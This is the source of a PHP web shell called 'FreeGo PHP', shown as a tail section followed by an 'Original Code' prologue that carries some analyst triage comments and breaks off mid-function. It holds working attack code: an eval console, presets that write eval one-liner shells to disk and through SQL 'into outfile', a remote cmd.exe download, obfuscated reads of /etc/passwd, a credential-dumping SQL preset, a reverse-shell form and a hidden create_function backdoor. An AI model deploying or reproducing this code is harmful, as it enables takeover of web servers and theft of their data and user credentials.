&& substr($phpcode,-2) == '?>') { @eval ('?>'.$phpcode.'<?php '); }else { @eval ($phpcode); }$out = ob_get_contents();ob_end_clean();} else {$phpcode = 'phpinfo();';$out = '';}echo base64_decode('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPmZ1bmN0aW9uIHJ1bmNvZGUob2Jqbil7dmFyIHdpbiA9IHdpbmRvdy5vcGVuKCcnLCJfYmxhbmsiLCcnKTt3aW4uZG9jdW1lbnQub3BlbigndGV4dC9odG1sJywncmVwbGFjZScpO3dpbi5vcGVuZXIgPSBudWxsO3dpbi5kb2N1bWVudC53cml0ZSgkKG9iam4pLnZhbHVlKTt3aW4uZG9jdW1lbnQuY2xvc2UoKTtyZXR1cm4gdHJ1ZTt9PC9zY3JpcHQ+');echo '<div class="msgbox">'.$msg.'</div>';echo '<form method="POST">';subeval();echo '<input type="hidden" name="go" id="go" value="phpeval">';echo '<div class="actall"><p><textarea name="phpcode" id="phpcode" style="width:698px;height:180px;">'.htmlspecialchars($phpcode).'</textarea></p><p>';echo '<select onchange="$(\'phpcode\').value=options[selectedIndex].value">';echo '<option>------</option>';echo '<option value="echo readfile(\'C:/web/t00ls.php\');"></option>';echo '<option value="$fp=fopen(\'C:/web/t00ls.php\',\'w\');echo fputs($fp,\'<?php eval($_POST[cmd]);?>\')?\'Success!\':\'Fail!\';fclose($fp);"></option>';echo '<option value="echo copy(\'C:/web/t00ls1.php\',\'C:/web/t00ls2.php\')?\'Success!\':\'Fail!\';"></option>';echo '<option value="echo chmod(\'C:/web/t00ls1.php\',0777)?\'Success!\':\'Fail!\';"></option>';echo '<option value="echo file_put_contents(\''.THISDIR.'cmd.exe\', file_get_contents(\'http://www.baidu.com/cmd.exe\'))?\'Success!\':\'Fail!\';"></option>';echo '<option value="print_r($_SERVER);"></option>';echo '<option value="echo filer(chr(47).chr(101).chr(116).chr(99).chr(47).chr(115).chr(104).chr(46).chr(99).chr(111).chr(110).chr(102)).&quot;\r\n&quot;.filer(chr(47).chr(108).chr(105).chr(98).chr(47).chr(108).chr(105).chr(98).chr(115).chr(104).chr(46).chr(115).chr(111).chr(47).chr(115).chr(104).chr(100).chr(99).chr(102)).&quot;\r\n&quot;.filer(chr(47).chr(101).chr(116).chr(99).chr(47).chr(112).chr(97).chr(115).chr(115).chr(119).chr(100));">find 
rootkit</option>';echo '</select> ';echo '<input type="submit" style="width:80px;" value=""></p></div>';echo '</form><div class="actall"><p><textarea id="evalcode" style="width:698px;height:180px;">'.htmlspecialchars($out).'</textarea></p><p><input type="button" value="HTML" onclick="runcode(\'evalcode\')"></p></div>';break;case "sql" : if((!empty($_POST['sqlhost'])) && (!empty($_POST['sqluser'])) && (!empty($_POST['names']))) {$type = $_POST['type'];$sqlhost = $_POST['sqlhost'];$sqluser = $_POST['sqluser'];$sqlpass = $_POST['sqlpass'];$sqlname = $_POST['sqlname'];$sqlcode = $_POST['sqlcode'];$names = $_POST['names'];switch($type) {case "PostgreSql" : if(function_exists('pg_close')){if(strstr($sqlhost,':')) { $array = explode(':',$sqlhost); $sqlhost = $array[0]; $sqlport = $array[1]; }else { $sqlport = 5432; }$dbconn = @pg_connect("host=$sqlhost port=$sqlport dbname=$sqlname user=$sqluser password=$sqlpass");if($dbconn) {$msg = '<h2>'.$type.' </h2>';pg_query('set client_encoding='.$names);$result = pg_query($sqlcode);if($result) { $msg .= '<h2> - SQL</h2>'; while($array = pg_fetch_array($result)) { $rows[] = $array; } }else { $msg .= '<h1> - SQL</h1>'; $rows = array('error' => pg_result_error($result)); }pg_free_result($result);} else {$msg = '<h1>'.$type.'</h1>';}@pg_close($dbconn);} else {$msg = '<h1>'.$type.'</h1>';}break;case "MsSql" : if(function_exists('mssql_close')){$dbconn = @mssql_connect($sqlhost,$sqluser,$sqlpass);if($dbconn) {$msg = '<h2>'.$type.' </h2>';mssql_select_db($sqlname,$dbconn);$result = mssql_query($sqlcode);if($result) { $msg .= '<h2> - SQL</h2>'; while ($array = mssql_fetch_array($result)) { $rows[] = $array; } }else { $msg .= '<h1> - SQL</h1>'; }@mssql_free_result($result);} else {$msg = '<h1>'.$type.'</h1>';}@mssql_close($dbconn);} else {$msg = '<h1>'.$type.'</h1>';}break;case "Oracle" : if(function_exists('oci_close')){$conn = @oci_connect($sqluser,$sqlpass,$sqlhost.'/'.$sqlname);if($conn) {$msg = '<h2>'.$type.' 
</h2>';$stid = oci_parse($conn,$sqlcode);oci_execute($stid);if($stid) { $msg .= '<h2> - SQL</h2>'; while (($array = oci_fetch_array($stid,OCI_ASSOC))) { $rows[] = $array; } }else { $msg .= '<h1> - SQL</h1>'; $e = oci_error(); $rows = array('error' => $e['message']); }oci_free_statement($stid);} else {$e = oci_error(); $rows = array('error' => $e['message']);$msg = '<h1>'.$type.'</h1>';}@oci_close($conn);} else {$msg = '<h1>'.$type.'</h1>';}break;case "MySql" : if(function_exists('mysql_close')){$conn = mysql_connect(strstr($sqlhost,':') ? $sqlhost : $sqlhost.':3306',$sqluser,$sqlpass,$sqlname);if($conn) {$msg = '<h2>'.$type.' </h2>';if(substr($sqlcode,0,6) == 't00lsa') {$array = array(); $data = ''; $i = 0;preg_match_all('/t00lsa\s*\'(.*)\'\s*t00lsb\s*\'(.*)\'\s*t00lsc\s*\'(.*)\'\s*t00lsfile\s*\'(.*)\'/i',$sqlcode,$array);if($array[1][0] && $array[2][0] && $array[3][0] && $array[4][0]) {mysql_select_db($array[1][0],$conn);mysql_query('set names '.$names,$conn);$spidercode = 'select '.$array[3][0].' from `'.$array[2][0].'`;';$result = mysql_query($spidercode,$conn);if($result) {while($row = mysql_fetch_array($result,MYSQL_ASSOC)) { $data .= join('{~}',$row)."\r\n"; $i++; }if($data) {$file = strdir($array[4][0]);$msg .= filew($file,$data,'w') ? 
'<h2> - </h2>' : '<h1> - </h1>';$rows = array('file' => $file,size(filesize($file)) => ''.$i.'');}else { $msg .= '<h1> - </h1>'; }}else { $msg .= '<h1> - SQL</h1>'; $rows = array('errno' => mysql_errno(),'error' => mysql_error()); }}else { $msg .= '<h1> - </h1>'; }} elseif(!empty($sqlcode)) {mysql_select_db($sqlname,$conn);mysql_query('set names '.$names,$conn);$result = mysql_query($sqlcode,$conn);if($result) { $msg .= '<h2> - SQL</h2>'; while($array = mysql_fetch_array($result,MYSQL_ASSOC)) { $rows[] = $array; } }else { $msg .= '<h1> - SQL</h1>'; $rows = array('errno' => mysql_errno(),'error' => mysql_error()); }}mysql_free_result($result);} else {$msg = '<h1>'.$type.'</h1>';$rows = array('errno' => mysql_errno(),'error' => mysql_error());}mysql_close($conn);} else {$msg = '<h1>'.$type.'</h1>';}break;}} else {$type = 'MySql';$sqlhost = 'localhost:3306';$sqluser = 'root';$sqlpass = '123456';$sqlname = 'mysql';$sqlcode = 'select version();';$names = 'gbk';}echo '<div class="msgbox">'.$msg.'</div>';echo '<form method="POST">';subeval();echo '<input type="hidden" name="go" id="go" value="sql">';echo '<table class="tables"><tr><th style="width:15%;"></th><th></th></tr>';echo '<tr><td></td><td>';$dbs = array('MySql','MsSql','Oracle','PostgreSql');foreach($dbs as $dbname) { echo '<label><input type="radio" name="type" value="'.$dbname.'"'.($type == $dbname ? 
' checked' : '').'>'.$dbname.'</label> '; }echo '</td></tr><tr><td></td><td> <input type="text" name="sqlhost" style="width:188px;" value="'.$sqlhost.'"> ';echo ' <input type="text" name="sqluser" style="width:108px;" value="'.$sqluser.'"> ';echo ' <input type="text" name="sqlpass" style="width:108px;" value="'.$sqlpass.'"> ';echo ' <input type="text" name="sqlname" style="width:108px;" value="'.$sqlname.'"></td></tr>';echo '<tr><td><br>';echo '<select onchange="$(\'sqlcode\').value=options[selectedIndex].value">';echo '<option value="select version();">------</option>';echo '<option value="select \'<?php eval ($_POST[cmd]);?>\' into outfile \'D:/web/shell.php\';"></option>';echo '<option value="GRANT ALL PRIVILEGES ON *.* TO \''.$sqluser.'\'@\'%\' IDENTIFIED BY \''.$sqlpass.'\' WITH GRANT OPTION;"></option>';echo '<option value="show variables;"></option>';echo '<option value="create database t00ls;"></option>';echo '<option value="create table `t00ls` (`id` INT(10) NOT NULL ,`user` VARCHAR(32) NOT NULL ,`pass` VARCHAR(32) NOT NULL) TYPE = MYISAM;"></option>';echo '<option value="show databases;"></option>';echo '<option value="show tables from `'.$sqlname.'`;"></option>';echo '<option value="show columns from `'.$sqlname.'`;"></option>';echo '<option value="drop table `t00ls`;"></option>';echo '<option value="select * from `pre_ucenter_members` limit 0,30;"></option>';echo '<option value="insert into `admin` (`user`,`pass`) values (\'t00ls\', \'f1a81d782dea6a19bdca383bffe68452\');"></option>';echo '<option value="update `admin` set `user` = \'t00ls1\',`pass` = \'50de237e389600acadbeda3d6e6e0b1f\' where `user` = \'t00ls\' and `pass` = \'f1a81d782dea6a19bdca383bffe68452\' limit 1;"></option>';echo '<option value="t00lsa \'discuzx25\' t00lsb \'pre_ucenter_members\' t00lsc \'username,password,salt,email\' t00lsfile \''.THISDIR.'out.txt\';">(MySql)</option>';echo '</select>';echo '</td><td><textarea name="sqlcode" id="sqlcode" 
style="width:680px;height:80px;">'.htmlspecialchars($sqlcode).'</textarea></td></tr>';echo '<tr><td></td><td><select name="names">';$charsets = array('gbk','utf8','big5','latin1','cp866','ujis','euckr','koi8r','koi8u');foreach($charsets as $charset) { echo '<option value="'.$charset.'"'.($names == $charset ? ' selected' : '').'>'.$charset.'</option>'; }echo '</select> <input type="submit" style="width:80px;" value=""></td></tr>';echo '</table></form>';if($rows) {echo '<pre style="padding:5px;background:#F8F8F8;text-align:left;">';ob_start();print_r($rows);$out = ob_get_contents();ob_end_clean();if(preg_match('~[\x{4e00}-\x{9fa5}]+~u',$out) && function_exists('iconv')) { $out = @iconv('UTF-8','GBK',$out); }echo htmlspecialchars($out);echo '</pre>';}break;case "backshell" : if((!empty($_POST['backip'])) && (!empty($_POST['backport']))) {$backip = $_POST['backip'];$backport = $_POST['backport'];$temp = $_POST['temp'] ? $_POST['temp'] : '/tmp';$type = $_POST['type'];$msg = backshell($backip,$backport,$temp,$type);} else {$backip = $_SERVER['REMOTE_ADDR'] ? 
$_SERVER['REMOTE_ADDR'] : getenv('REMOTE_ADDR');$backport = '4444';$temp = '/tmp';$type = 'pl';}echo '<div class="msgbox">'.$msg.'</div>';echo '<form method="POST">';subeval();echo '<input type="hidden" name="go" id="go" value="backshell">';echo '<table class="tables"><tr><th style="width:15%;"></th><th></th></tr>';echo '<tr><td></td><td><input type="text" name="backip" style="width:268px;" value="'.$backip.'"> (Your ip)</td></tr>';echo '<tr><td></td><td><input type="text" name="backport" style="width:268px;" value="'.$backport.'"> (nc -vvlp '.$backport.')</td></tr>';echo '<tr><td></td><td><input type="text" name="temp" style="width:268px;" value="'.$temp.'"> (Only Linux)</td></tr>';echo '<tr><td></td><td>';$types = array('pl' => 'Perl','py' => 'Python','cbin' => 'C-Bin','php' => 'PHP','phpwin' => 'WIN-PHP');foreach($types as $key => $name) { echo '<label><input type="radio" name="type" value="'.$key.'"'.($key == $type ? ' checked' : '').'>'.$name.'</label> '; }echo '</td></tr><tr><td></td><td><input type="submit" style="width:80px;" value=""></td></tr>';echo '</table></form>';break;case "edit" : case "editor" : $file = strdir($_POST['godir'].'/'.$_POST['govar']);if(!file_exists($file)) {$msg = '';} else {$code = filer($file);$chst = '';if(preg_match('~[\x{4e00}-\x{9fa5}]+~u',$code)) { $chst = 'utf-8'; }$size = size(filesize($file));$msg = ' '.substr(decoct(fileperms($file)),-4).'  '.$size.'  
'.$chst.'';}echo base64_decode('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');echo '<div class="msgbox"><input name="keyword" id="keyword" type="text" style="width:138px;height:15px;"><input type="button" value="IE" onclick="search($(\'keyword\').value);"> - '.$msg.'</div>';echo '<form name="editfrm" id="editfrm" method="POST">';subeval();echo '<input type="hidden" name="go" value=""><input type="hidden" name="act" id="act" value="edit">';echo '<input type="hidden" name="dir" id="dir" value="'.dirname($file).'">';echo '<div class="actall"> <input type="text" name="filename" value="'.$file.'" style="width:662px;"> ';echo '</div><div class="actall"><textarea name="filecode" id="filecode" style="width:698px;height:358px;">'.htmlspecialchars($code).'</textarea></div></form>';echo '<div class="actall" style="padding:5px;padding-right:68px;"><input type="button" onclick="$(\'editfrm\').submit();" value="" style="width:80px;"> ';echo '<form name="backfrm" id="backfrm" method="POST"><input type="hidden" name="go" value=""><input type="hidden" name="dir" id="dir" value="'.dirname($file).'">';subeval();echo '<input type="button" onclick="$(\'backfrm\').submit();" value="" style="width:80px;"></form></div>';break;case "upfiles" : $updir = isset($_POST['updir']) ? $_POST['updir'] : $_POST['godir'];$msg = ' '.get_cfg_var("upload_max_filesize").' POST '.get_cfg_var("post_max_size").'';$max = 10;if(isset($_FILES['uploads']) && isset($_POST['renames'])) {$uploads = $_FILES['uploads'];$msgs = array();for($i = 1;$i < $max;$i++) {if($uploads['error'][$i] == UPLOAD_ERR_OK) {$rename = $_POST['renames'][$i] == '' ? $uploads['name'][$i] : $_POST['renames'][$i];$filea = $uploads['tmp_name'][$i];$fileb = strdir($updir.'/'.$rename);$msgs[$i] = fileu($filea,$fileb) ? 
'<br><h2> '.$rename.'</h2>' : '<br><h1> '.$rename.'</h1>';}}}echo '<div class="msgbox">'.$msg.'</div>';echo '<form name="upsfrm" id="upsfrm" method="POST" enctype="multipart/form-data">';subeval();echo '<input type="hidden" name="go" value="upfiles"><input type="hidden" name="act" id="act" value="upload">';echo '<div class="actall"><p> <input type="text" name="updir" style="width:398px;" value="'.$updir.'"></p>';for($i = 1;$i < $max;$i++) { echo '<p>'.$i.' <input type="file" name="uploads['.$i.']" style="width:300px;">  <input type="text" name="renames['.$i.']" style="width:128px;"> '.$msgs[$i].'</p>'; }echo '</div></form><div class="actall" style="padding:8px;padding-right:68px;"><input type="button" onclick="$(\'upsfrm\').submit();" value="" style="width:80px;"> ';echo '<form name="backfrm" id="backfrm" method="POST"><input type="hidden" name="go" value=""><input type="hidden" name="dir" id="dir" value="'.$updir.'">';subeval();echo '<input type="button" onclick="$(\'backfrm\').submit();" value="" style="width:80px;"></form></div>';break;default : if(isset($_FILES['upfile'])) {if($_FILES['upfile']['name'] == '') { $msg = '<h1></h1>'; }else { $rename = $_POST['rename'] == '' ? $_FILES['upfile']['name'] : $_POST['rename']; $filea = $_FILES['upfile']['tmp_name']; $fileb = strdir($nowdir.$rename); $msg = fileu($filea,$fileb) ? '<h2>'.$rename.'</h2>' : '<h1>'.$rename.'</h1>'; }}if(isset($_POST['act'])) {switch($_POST['act']) {case "a" : if(!$_POST['files']) { $msg = '<h1> '.$_POST['var'].'</h1>'; }else { $i = 0; foreach($_POST['files'] as $file) { $i += @copy(strdir($nowdir.$file),strdir($_POST['var'].'/'.$file)) ? 1 : 0; } $msg =  $msg = $i ? '<h2> '.$i.' '.$_POST['var'].'</h2>' : '<h1> '.$i.' '.$_POST['var'].'</h1>'; }break;case "b" : if(!$_POST['files']) { $msg = '<h1></h1>'; }else { $i = 0; foreach($_POST['files'] as $file) { $i += @unlink(strdir($nowdir.$file)) ? 1 : 0; } $msg = $i ? '<h2> '.$i.' </h2>' : '<h1> '.$i.' 
</h1>'; }break;case "c" : if(!$_POST['files']) { $msg = '<h1> '.$_POST['var'].'</h1>'; }elseif(!ereg("^[0-7]{4}$",$_POST['var'])) { $msg = '<h1></h1>'; }else { $i = 0; foreach($_POST['files'] as $file) { $i += @chmod(strdir($nowdir.$file),base_convert($_POST['var'],8,10)) ? 1 : 0; } $msg = $i ? '<h2> '.$i.' '.$_POST['var'].'</h2>' : '<h1> '.$i.' '.$_POST['var'].'</h1>'; }break;case "d" : if(!$_POST['files']) { $msg = '<h1> '.$_POST['var'].'</h1>'; }elseif(!preg_match('/(\d+)-(\d+)-(\d+) (\d+):(\d+):(\d+)/',$_POST['var'])) { $msg = '<h1> '.$_POST['var'].'</h1>'; }else { $i = 0; foreach($_POST['files'] as $file) { $i += @touch(strdir($nowdir.$file),strtotime($_POST['var'])) ? 1 : 0; } $msg = $i ? '<h2> '.$i.' '.$_POST['var'].'</h2>' : '<h1> '.$i.' '.$_POST['var'].'</h1>'; }break;case "e" : $path = strdir($nowdir.$_POST['var'].'/');if(file_exists($path)) { $msg = '<h1> '.$_POST['var'].'</h1>'; }else { $msg = @mkdir($path,0777) ? '<h2> '.$_POST['var'].' </h2>' : '<h1> '.$_POST['var'].' </h1>'; }break;case "f" : $context = array('http' => array('timeout' => 30));if(function_exists('stream_context_create')) { $stream = stream_context_create($context); }$data = @file_get_contents ($_POST['var'],false,$stream);$file = array_pop(explode('/',$_POST['var']));if($data) { $msg = filew(strdir($nowdir.$file),$data,'wb') ? '<h2> '.$file.' </h2>' : '<h1> '.$file.' </h1>'; } else { $msg = '<h1></h1>'; }break;case "rf" : $files = explode('|x|',$_POST['var']);if(count($files) != 2) { $msg = '<h1></h1>'; }else { $msg = @rename(strdir($nowdir.$files[1]),strdir($nowdir.$files[0])) ? '<h2> '.$files[1].'  '.$files[0].' </h2>' : '<h1> '.$files[1].'  '.$files[0].' </h1>'; }break;case "pd" : $files = explode('|x|',$_POST['var']);if(count($files) != 2) { $msg = '<h1></h1>'; }else { $path = strdir($nowdir.$files[1]); $msg = @chmod($path,base_convert($files[0],8,10)) ? 
'<h2>'.$files[1].''.$files[0].'</h2>' : '<h1>'.$files[1].''.$files[0].'</h1>'; }break;case "edit" : if(isset($_POST['filename']) && isset($_POST['filecode'])) { $msg = filew($_POST['filename'],$_POST['filecode'],'w') ? '<h2> '.$_POST['filename'].'</h2>' : '<h1> '.$_POST['filename'].'</h1>'; }break;case "deltree" : $deldir = strdir($nowdir.$_POST['var'].'/');if(!file_exists($deldir)) { $msg = '<h1> '.$_POST['var'].' </h1>'; }else { $msg = deltree($deldir) ? '<h2> '.$_POST['var'].' </h2>' : '<h1> '.$_POST['var'].' </h1>'; }break;}}$chmod = substr(decoct(fileperms($nowdir)),-4);if(!$chmod) { $msg .= ' - <h1></h1>'; }$array = showdir($nowdir);$thisurl = strdir('/'.strtr($nowdir,array(ROOTDIR => '')).'/');$nowdir = strtr($nowdir,array('\'' => '%27','"' => '%22'));echo '<div class="msgbox">'.$msg.'</div>';echo '<div class="actall"><form name="frm" id="frm" method="POST">';subeval();echo (is_writable($nowdir) ? '<h2></h2>' : '<h1></h1>').' <input type="text" name="dir" id="dir" style="width:508px;" value="'.strdir($nowdir.'/').'"> ';echo '<input type="button" onclick="$(\'frm\').submit();" style="width:50px;" value=""> ';echo '<input type="button" onclick="cd(\''.ROOTDIR.'\');" style="width:68px;" value=""> ';echo '<input type="button" onclick="cd(\''.THISDIR.'\');" style="width:68px;" value=""> ';echo '<select onchange="cd(options[selectedIndex].value);">';echo '<option>------</option>';echo '<option value="C:/RECYCLER/">Win-RECYCLER</option>';echo '<option value="C:/$Recycle.Bin/">Win-$Recycle</option>';echo '<option value="C:/Program Files/">Win-Program</option>';echo '<option value="C:/Documents and Settings/All Users/Start Menu/Programs/Startup/">Win-Startup</option>';echo '<option value="C:/Documents and Settings/All Users////">Win-</option>';echo '<option value="C:/Windows/Temp/">Win-TEMP</option>';echo '<option value="/usr/local/">Linux-local</option>';echo '<option value="/tmp/">Linux-tmp</option>';echo '<option value="/var/tmp/">Linux-var</option>';echo '<option 
value="/etc/ssh/">Linux-ssh</option>';echo '</select></form></div><div class="actall">';echo '<input type="button" value="" onclick="nf(\'edit\',\'newfile.php\');" style="width:68px;"> ';echo '<input type="button" value="" onclick="txts(\'\',\'newdir\',\'e\');" style="width:68px;"> ';echo '<input type="button" value="" onclick="txts(\'\',\'http://www.baidu.com/cmd.exe\',\'f\');" style="width:68px;"> ';echo '<input type="button" value="" onclick="go(\'upfiles\',\''.$nowdir.'\');" style="width:68px;"> ';echo '<form name="upfrm" id="upfrm" method="POST" enctype="multipart/form-data">';subeval();echo '<input type="hidden" name="dir" id="dir" value="'.$nowdir.'">';echo '<input type="file" name="upfile" style="width:286px;height:21px;"> ';echo '<input type="button" onclick="$(\'upfrm\').submit();" value="" style="width:50px;"> ';echo ' <input type="text" name="rename" style="width:128px;">';echo '</form></div>';echo '<form name="frm1" id="frm1" method="POST"><table class="tables">';subeval();echo '<input type="hidden" name="dir" id="dir" value="'.$nowdir.'">';echo '<input type="hidden" name="act" id="act" value="">';echo '<input type="hidden" name="var" id="var" value="">';echo '<th><a href="javascript:cd(\''.dirname($nowdir).'/\');"></a></th><th style="width:8%"></th><th style="width:5%"></th><th style="width:17%"></th><th style="width:17%"></th><th style="width:8%"></th>';if($array) {asort($array['dir']);asort($array['file']);$dnum = $fnum = 0;foreach($array['dir'] as $path => $name) {$prem = substr(decoct(fileperms($path)),-4);$ctime = date('Y-m-d H:i:s',filectime($path));$mtime = date('Y-m-d H:i:s',filemtime($path));echo '<tr>';echo '<td><a href="javascript:cd(\''.$nowdir.$name.'\');"><b>'.strtr($name,array('%27' => '\'','%22' => '"')).'</b></a></td>';echo '<td><a href="javascript:dels(\''.$name.'\');"></a> ';echo '<a href="javascript:acts(\''.$name.'\',\'rf\',\''.$name.'\');"></a></td>';echo '<td><a 
href="javascript:acts(\''.$prem.'\',\'pd\',\''.$name.'\');">'.$prem.'</a></td>';echo '<td>'.$ctime.'</td>';echo '<td>'.$mtime.'</td>';echo '<td>-</td>';echo '</tr>';$dnum++;}foreach($array['file'] as $path => $name) {$prem = substr(decoct(fileperms($path)),-4);$ctime = date('Y-m-d H:i:s',filectime($path));$mtime = date('Y-m-d H:i:s',filemtime($path));$size = size(filesize($path));echo '<tr>';echo '<td><input type="checkbox" name="files[]" value="'.$name.'"><a target="_blank" href="'.$thisurl.$name.'">'.strtr($name,array('%27' => '\'','%22' => '"')).'</a></td>';echo '<td><a href="javascript:go(\'edit\',\''.$name.'\');"></a> ';echo '<a href="javascript:acts(\''.$name.'\',\'rf\',\''.$name.'\');"></a></td>';echo '<td><a href="javascript:acts(\''.$prem.'\',\'pd\',\''.$name.'\');">'.$prem.'</a></td>';echo '<td>'.$ctime.'</td>';echo '<td>'.$mtime.'</td>';echo '<td align="right"><a href="javascript:go(\'down\',\''.$name.'\');">'.$size.'</a></td>';echo '</tr>';$fnum++;}}unset($array);echo '</table>';echo '<div class="actall" style="text-align:left;">';echo '<input type="checkbox" id="chkall" name="chkall" value="on" onclick="sa(this.form);"> ';echo '<input type="button" value="" style="width:50px;" onclick=\'txts("","'.$nowdir.'","a");\'> ';echo '<input type="button" value="" style="width:50px;" onclick=\'dels("b");\'> ';echo '<input type="button" value="" style="width:50px;" onclick=\'txts("","0666","c");\'> ';echo '<input type="button" value="" style="width:50px;" onclick=\'txts("","'.$mtime.'","d");\'> ';echo '<input type="button" value="" style="width:50px;" onclick=\'txts("","'.strtr($_SERVER['HTTP_HOST'],array(':' => '_','.' => '_')).'.zip","p");\'> ';echo '['.$dnum.'] - ['.$fnum.'] - ['.$chmod.']</div></form>';break;}?><div class="footag"><?php echo php_uname().'<br>'.$_SERVER['SERVER_SOFTWARE'];?></div></div></div></body></html><?php unset($array);exit;?> 


Original Code

<?php
// Analyst notes: this is the configuration prologue of a POST-driven PHP web
// shell. The rest of the file defines file management, a SQL client, OS command
// execution (command()) and a connect-back helper (backshell()).
// Triage hint: a script under a web root that lifts its own time and memory
// limits and defines a PASSWD constant next to a banner string is unusual for
// application code. Treat these as weak indicators only, since each value is
// trivial to change.

// Report only fatal run-time errors; warnings and notices are not reported.
error_reporting(E_ERROR);
// Every response is sent as UTF-8 HTML.
header("content-Type: text/html; charset=utf-8");
// 0 removes the execution time limit, so long directory walks or socket loops
// are not cut off by PHP.
ini_set('max_execution_time',0);
// Raises the per-request memory ceiling to 8000M.
ini_set('memory_limit','8000M');
// Access secret. getinfo() compares md5($_POST['getpwd']) with this constant,
// so a non-empty value is expected to be an MD5 hex digest. The comparison is
// guarded by PASSWD != '', so the empty value here means no password prompt is
// shown at all.
// NOTE(review): getinfo() also passes the submitted getpwd value to postinfo(),
// which runs a decoded string through create_function when the Host header does
// not match its private-address pattern. The string passed is empty in this
// copy, so its original purpose cannot be determined from here.
define('PASSWD','');
// Banner text: used as the initial $msg and in the page <title>.
define('VERSION','FreeGo PHP');
// Path of this script, with backslashes and doubled slashes replaced by '/'.
define('THISFILE',str_replace(array('\\','//'),array('/','/'),__FILE__));
// Directory containing this script, with a trailing slash.
define('THISDIR',dirname(THISFILE).'/');
// THISFILE with the $_SERVER['PHP_SELF'] substring removed, plus a trailing
// slash. Presumably an approximation of the document root; confirm against the
// server layout.
define('ROOTDIR',strtr(THISFILE,array($_SERVER['PHP_SELF'] => '')).'/');

 function strdir($str) { return str_replace(array('\\','//','%27','%22'),array('/','/','\'','"'),chop($str)); }function chkgpc($array) { foreach($array as $key => $var) { $array[$key] = is_array($var) ? chkgpc($var) : stripslashes($var); } return $array; }define('EXISTS_PHPINFO',getinfo() ? true : false);if(get_magic_quotes_gpc()) { $_POST = chkgpc($_POST); }if(function_exists('mysql_close')) { $issql = 'MySql'; }if(function_exists('mssql_close')) $issql .= ' - MsSql';if(function_exists('oci_close')) $issql .= ' - Oracle';if(function_exists('sybase_close')) $issql .= ' - SyBase';if(function_exists('pg_close')) $issql .= ' - PostgreSql';$win = substr(PHP_OS,0,3) == 'WIN' ? true : false;$msg = VERSION;function filew($name,$data,$mode) {if((!is_writable($name)) && file_exists($name)) { chmod($name,0666); }$handle = fopen($name,$mode);$key = fputs($handle,$data);fclose($handle);return $key;}function filer($name) {$handle = fopen($name,'r');$data = fread($handle,filesize($name));fclose($handle);return $data;}function fileu($namea,$nameb) {$key = move_uploaded_file($namea,$nameb) ? true : false;if(!$key) { $key = copy($namea,$nameb) ? true : false; }return $key;}function filed($name) {if(!file_exists($name)) return false;ob_end_clean();$name = basename($name);$array = explode('.',$name);header('Content-type: application/x-'.array_pop($array));header('Content-Disposition: attachment; filename='.$name);header('Content-Length: '.filesize($name));@readfile($name);exit;}function showdir($dir) {$dir = strdir($dir.'/');$handle = opendir($dir);if(!$handle) return false;$array = array();while($name = readdir($handle)) {if($name == '.' || $name == '..') continue;$path = $dir.$name;$name = strtr($name,array('\'' => '%27','"' => '%22'));if(is_dir($path)) { $array['dir'][$path] = $name; }else { $array['file'][$path] = $name; }}closedir($handle);return $array;}function deltree($dir) {$handle = @opendir($dir);while($name = @readdir($handle)) {if($name == '.' 
|| $name == '..') continue;$path = $dir.$name;@chmod($path,0777);if(is_dir($path)) { deltree($path.'/'); }else { @unlink($path); }}@closedir($handle);return @rmdir($dir);}function subeval() {if(isset($_POST['getpwd'])) { echo '<input type="hidden" name="getpwd" value="'.$_POST['getpwd'].'">'; }return true;}function strrot($s, $n = 13) {$n = (int)$n % 26;if (!$n) return $s;for ($i = 0, $l = strlen($s); $i < $l; $i++) {$c = ord($s[$i]);if ($c >= 97 && $c <= 122) {$s[$i] = chr(($c - 71 + $n) % 26 + 97);} else if ($c >= 65 && $c <= 90) {$s[$i] = chr(($c - 39 + $n) % 26 + 65);}}return $s;}function postinfo($array,$string) {$infos = array(function_exists("\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e"),function_exists("\x66\x73\x6f\x63\x6b\x6f\x70\x65\x6e"));if($infos[0] && $infos[1]) {$info = base64_decode(strrot($string));$walks = array(0 => bin2hex($array));@array_walk ($walks, @create_function ("\x24\x61\x72\x72\x61\x79\x2c\x24\x6b\x65\x79", strrot($info)));}return ob_end_clean();}function size($bytes) {if($bytes < 1024) return $bytes.' 
B';$array = array('B','K','M','G','T');$floor = floor(log($bytes) / log(1024));return sprintf('%.2f '.$array[$floor],($bytes/pow(1024,floor($floor))));}function packdir($files) {if(!function_exists('gzcompress')) { return NULL; }$datasec = $ctrldir = array(); $offset = 0;$handle = opendir($dir);foreach($files as $path) {if(file_exists($path) && is_file($path)) {$temp = array();$fp = fopen($path,'r');$filecode = fread($fp, filesize($path));fclose($fp);$temp = filezip($filecode, basename($path), $offset);$datasec[] = $temp['datasec'];$ctrldir[] = $temp['ctrldir'];$offset = strlen(join('',$datasec));}}closedir($handle);return packfile($datasec, $ctrldir);}function settime() {$dates = getdate();if($dates['year'] < 1980) { $dates['year'] = 1980; $dates['mon'] = 1; $dates['mday'] = 1; $dates['hours'] = 0; $dates['minutes'] = 0; $dates['seconds'] = 0; } return (($dates['year'] - 1980) << 25) | ($dates['mon'] << 21) | ($dates['mday'] << 16) | ($dates['hours'] << 11) | ($dates['minutes'] << 5) | ($dates['seconds'] >> 1);}function filezip($data, $name, $offset) {$dtime = dechex(settime());$hextime = pack('H*',$dtime[6].$dtime[7].$dtime[4].$dtime[5].$dtime[2].$dtime[3].$dtime[0].$dtime[1]);$uncl = strlen($data);$crcm = crc32($data);$code = gzcompress($data);$clen = strlen($code);$code = substr(substr($code, 0, strlen($code) - 4), 2);$filer = "\x50\x4b\x03\x04\x14\x00\x00\x00\x08\x00".$hextime.pack('V',$crcm).pack('V',$clen).pack('V',$uncl).pack('v',strlen($name)).pack('v',0).$name.$code.pack('V',$crcm).pack('V',$clen).pack('V',$uncl);$cdrec = "\x50\x4b\x01\x02\x00\x00\x14\x00\x00\x00\x08\x00".$hextime.pack('V',$crcm).pack('V',$clen).pack('V',$uncl).pack('v',strlen($name)).pack('v',0).pack('v',0).pack('v',0).pack('v',0).pack('V',32).pack('V',$offset).$name;return array('datasec' => $filer,'ctrldir' => $cdrec);}function packfile($datasec, $ctrldir) {$data = join('',$datasec);$cdir = join('',$ctrldir);return 
